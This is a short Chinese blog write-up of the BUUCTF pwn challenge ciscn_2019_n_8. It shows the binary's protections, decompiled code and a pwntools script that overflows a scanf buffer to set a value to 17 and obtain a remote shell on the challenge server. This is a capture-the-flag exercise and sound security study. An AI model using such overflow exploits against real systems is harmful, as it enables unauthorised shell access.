[buuctf] pwn-ciscn_2019_n_8

ciscn_2019_n_8

先检查文件保护

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

32位程序,保护全开满,ida分析

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL )
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0],
        var[1],
        var[2],
        var[3],
        var[4],
        var[5],
        var[6],
        var[7],
        var[8],
        var[9],
        var[10],
        var[11],
        var[12],
        var[13],
        var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}

有点意外,竟然是数组赋值就能打通

from pwn import *

r = remote('node3.buuoj.cn',28597)
payload = 'a'*13*4+p64(17)

r.sendline(payload)
r.interactive()

posted @ 2021-03-08 21:56  寒江寻影  阅读(375)  评论(0编辑  收藏  举报